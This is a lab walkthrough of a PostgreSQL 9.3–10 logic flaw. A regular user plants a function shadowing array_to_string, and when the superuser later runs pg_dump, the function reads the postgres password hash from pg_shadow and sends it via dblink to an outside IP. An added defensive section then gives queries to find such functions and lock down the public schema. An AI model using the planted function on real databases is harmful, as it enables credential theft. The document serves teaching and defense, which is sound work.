PostgreSQL is a relational database. Versions 9.3 to 10 contain a logic error that lets a superuser unknowingly trigger malicious code created by a regular user, resulting in unexpected operations being executed.
After starting the vulnerability environment, we first connect to the PostgreSQL database locally as the regular user vulhub:vulhub.
psql --host your-ip --username vulhub
After connecting to the database, execute the following statements.
CREATE FUNCTION public.array_to_string(anyarray,text) RETURNS TEXT AS $$
    select dblink_connect((select 'hostaddr=47.240.75.183 port=5433 user=postgres password=chybeta sslmode=disable dbname='||(SELECT passwd FROM pg_shadow WHERE usename='postgres')));
    SELECT pg_catalog.array_to_string($1,$2);
$$ LANGUAGE SQL VOLATILE;

I listen on port 5433 on the VPS, waiting for the superuser to trigger this “backdoor” we left.
Simulate the root user on the target machine and execute the pg_dump command as a superuser, exporting the contents of the vulhub database:
docker-compose exec postgres pg_dump -U postgres -f evil.bak vulhub

When the above command runs, the “backdoor” is triggered, and the VPS receives sensitive information.
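From the defender's side, the planted function can be found and the public schema locked down with a few catalog queries. This is an added example, not part of the original writeup; it assumes a superuser session in the affected database (vulhub here), and the DROP statement uses the function signature shown above.

```sql
-- Added defensive example; run as a superuser in each database (e.g. vulhub).

-- 1. Can any role still create objects in the public schema?
--    'public' as the first argument means the PUBLIC pseudo-role.
SELECT has_schema_privilege('public', 'public', 'CREATE') AS public_can_create;

-- 2. List functions outside pg_catalog that reuse the name of a built-in
--    function and are owned by a non-superuser. Matching on name only is
--    deliberate: a planted function does not need the same argument types
--    as the built-in to be picked for an unqualified call.
SELECT n.nspname                                 AS schema_name,
       p.proname                                 AS function_name,
       pg_get_function_identity_arguments(p.oid) AS arguments,
       r.rolname                                 AS owner,
       p.prosrc                                  AS body
FROM pg_proc p
JOIN pg_namespace n ON n.oid = p.pronamespace
JOIN pg_roles     r ON r.oid = p.proowner
WHERE n.nspname NOT IN ('pg_catalog', 'information_schema')
  AND NOT r.rolsuper
  AND EXISTS (
        SELECT 1
        FROM pg_proc c
        JOIN pg_namespace cn ON cn.oid = c.pronamespace
        WHERE cn.nspname = 'pg_catalog'
          AND c.proname  = p.proname
      )
ORDER BY schema_name, function_name;

-- 3. Stop regular users from creating objects in public.
REVOKE CREATE ON SCHEMA public FROM PUBLIC;

-- 4. After reviewing the body returned by query 2, remove the planted function.
DROP FUNCTION public.array_to_string(anyarray, text);
```

Query 2 should return no rows on a clean database; any row whose body references dblink or pg_shadow, as the function above does, deserves immediate review.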